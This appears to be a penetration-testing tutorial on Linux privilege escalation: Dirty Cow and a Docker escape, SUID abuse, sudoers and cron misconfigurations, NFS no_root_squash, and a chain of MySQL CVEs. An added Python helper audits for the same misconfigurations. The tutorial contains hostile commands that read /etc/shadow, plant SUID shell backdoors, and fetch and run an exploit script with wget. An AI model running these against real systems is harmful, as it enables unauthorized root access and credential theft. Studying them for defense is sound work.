In a penetration test, privilege escalation is a critical step. Attackers commonly exploit kernel vulnerabilities, misconfigured permissions, or services running as root to find a foothold and escalate their privileges.

1. Kernel vulnerability privilege escalation

When it comes to privilege escalation through kernel vulnerabilities, Dirty Cow has to be mentioned: it is the longest-lived and most widely affecting bug of its kind. A low-privileged user can use this vulnerability to escalate locally, and it can also be used to escape a Docker container and obtain a shell with root privileges.

1.1 Local kernel privilege escalation

(1) Check the kernel version

lsb_release -a
uname -a

(2) Download the exploit source, compile it and generate the exp binary

bypass@ubuntu:~$ make
bypass@ubuntu:~$

(3) Run it; on success it returns a shell with root privileges.

1.2 Using the Dirty Cow vulnerability for Docker escape

(1) Inside the container, compile the PoC and run it:

(2) On the attacker's machine, the reverse shell from the host is received.

1.3 Linux privilege escalation tool

GitHub project address:

https://github.com/mzet-/linux-exploit-suggester.git

wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh -O les.sh

(1) The script automatically searches for privilege-escalation exploits matching the operating system version

(2) Download the PoC it suggests, compile it, and run it.

2. SUID privilege escalation

SUID is a special permission bit that lets the caller temporarily take on the privileges of the file's owner while the file executes. If you can find and run a root-owned SUID file, you hold root privileges for as long as that file runs.

(1) Find SUID files on Linux that can be used for privilege escalation

find / -perm -u=s -type f 2>/dev/null
(2) Run the find command as root

Commands that can be abused for privilege escalation on Linux when they carry the SUID bit, and how each is invoked:

# find
find pentestlab -exec whoami \;
# vim
vim.tiny /etc/shadow
# awk
awk 'BEGIN{system("whoami")}'
# curl
curl file:///etc/shadow
# bash
bash -p
# less
less /etc/passwd
# nmap
nmap --interactive

3. sudo privilege escalation

With sudo, an ordinary user executes commands as root. In many environments the sudoers file is misconfigured for the sake of convenient operations and maintenance, and that mistake is what allows privilege escalation.

(1) Configure sudo to require no password

vi /etc/sudoers

Add the following line at the end:

bypass ALL=(ALL:ALL) NOPASSWD:ALL

(2) Check the sudo permissions granted to the user

4. Scheduled tasks

If you can find a scheduled-task script that you have permission to modify, you can alter the script to escalate privileges. At root, this is a file-permission misconfiguration.

(1) List the scheduled tasks and find a task script that you have permission to modify

ls -l /etc/cron*
more /etc/crontab

(2) Add a SUID shell backdoor to mysqlback.sh; the next time the scheduled task runs as root, you can obtain root privileges

cp /bin/bash /tmp/shell
chmod u+s /tmp/shell

5. NFS privilege escalation

If the server exports a share with no_root_squash and the client accesses it as root, the client has root privileges on the shared directory. This no_root_squash setting can be used for privilege escalation.

(1) View the shared directory on the NFS server

sudo showmount -e 10.1.1.233

(2) Create a local mount point and mount the shared directory, then use the attacker's local root privileges to create a SUID shell.

sudo mkdir -p /tmp/data
sudo mount -t nfs 10.1.1.233:/home/bypass /tmp/data
cp /bin/bash /tmp/data/shell
chmod u+s /tmp/data/shell

(3) Back on the server, run the shell with -p as an ordinary user to obtain root privileges.
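Sections 3 to 5 above all come down to a configuration that a defender can check for: passwordless sudo, an NFS export with no_root_squash, and a root cron job whose script someone else can modify. The following audit helper is an added example, not part of the original post; the sudoers, exports and crontab text it parses and the file metadata it consults are constructed samples standing in for /etc/sudoers, /etc/exports, /etc/crontab and os.stat output.

```python
import re
import stat

# Constructed sample configs (not from any real host) that reproduce the weak
# settings discussed above: passwordless sudo, an NFS export with
# no_root_squash, and a root cron job whose script is world-writable.
SUDOERS = """\
root    ALL=(ALL:ALL) ALL
%admin  ALL=(ALL) ALL
bypass  ALL=(ALL:ALL) NOPASSWD:ALL
"""
EXPORTS = """\
/home/bypass  10.1.1.0/24(rw,sync,no_root_squash)
/srv/share    10.1.1.0/24(ro,sync,root_squash)
"""
CRONTAB = """\
SHELL=/bin/sh
# m h dom mon dow user command
*/5 * * * * root /usr/local/bin/mysqlback.sh
0 3 * * *   root /usr/sbin/logrotate /etc/logrotate.conf
"""
# path -> (st_mode, st_uid) as os.stat() would report; constructed values.
FILE_META = {
    "/usr/local/bin/mysqlback.sh": (0o100666, 1000),  # mode 666, owned by uid 1000
    "/usr/sbin/logrotate": (0o100755, 0),             # mode 755, owned by root
}

def nopasswd_sudoers(text):
    """Return users/groups granted NOPASSWD on every command (NOPASSWD:ALL)."""
    hits = []
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()  # drop comments
        if re.search(r"NOPASSWD:\s*ALL\b", line):
            hits.append(line.split()[0])
    return hits

def no_root_squash_exports(text):
    """Return export paths whose option list contains no_root_squash."""
    return [l.split()[0] for l in text.splitlines()
            if "no_root_squash" in l and not l.lstrip().startswith("#")]

def writable_root_cron_scripts(crontab, meta):
    """Return root cron commands whose script is not root-owned or is group/world writable."""
    findings = []
    for line in crontab.splitlines():
        parts = line.split()
        if line.lstrip().startswith("#") or len(parts) < 7 or parts[5] != "root":
            continue  # comments, variable assignments, non-root jobs
        path = parts[6]
        if path in meta:
            mode, uid = meta[path]
            if uid != 0 or mode & (stat.S_IWGRP | stat.S_IWOTH):
                findings.append(path)
    return findings
```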

6. MySQL privilege escalation

MySQL offers several escalation routes (UDF, MOF, writing to startup items, and so on), but the interesting case is chaining CVE-2016-6663 with CVE-2016-6664, which can escalate from www-data to root.

(1) Use CVE-2016-6663 to escalate from www-data to the mysql user

cd /var/www/html/
gcc mysql-privesc-race.c -o mysql-privesc-race -I/usr/include/mysql -lmysqlclient
./mysql-privesc-race test 123456 localhost testdb

(2) Use CVE-2016-6664 to escalate from the mysql user to root

wget http://legalhackers.com/exploits/CVE-2016-6664/mysql-chowned.sh
chmod 777 mysql-chowned.sh
./mysql-chowned.sh /var/log/mysql/error.log